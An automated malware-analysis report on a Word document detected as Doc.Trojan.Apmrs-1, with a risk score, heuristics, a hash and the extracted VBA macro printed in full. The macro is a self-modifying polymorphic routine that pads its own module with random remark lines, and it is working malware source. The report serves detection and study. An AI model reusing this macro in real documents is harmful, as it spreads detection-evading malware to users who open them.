MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The file is identified as malicious by ClamAV and contains VBA macros. The macro code itself appears to be designed for obfuscation, inserting random remark statements to increase its size and complexity. No direct malicious actions like downloading payloads or establishing persistence were observed in the provided script, leading to a moderate confidence level.
Heuristics 2
- ClamAV: Doc.Trojan.Apmrs-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Apmrs-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 994 bytes |

SHA-256: f63b83b66fa891cd8515a709d7bcf4892f4ab79d6d80678aa17cec8069e17d7c
Detection: ClamAV: Doc.Trojan.Apmrs-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "APMRS"
Sub AdvancedPolymorphicMacroReplicationSystem()
    On Error Resume Next
    Application.ScreenUpdating = False
    Set Current = MacroContainer
    For Grow = 1 To 20
        Number = Current.VBProject.VBComponents("APMRS").CodeModule.ProcCountLines("AdvancedPolymorphicMacroReplicationSystem", vbext_pk_Proc)
        RandomLine = Int(Rnd() * Number + 1)
        RemarkLength = Int(Rnd() * 40 + 1)
        For Length = 1 To RemarkLength
            Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
        Next Length
        Current.VBProject.VBComponents("APMRS").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
        Remark = ""
    Next Grow
End Sub
```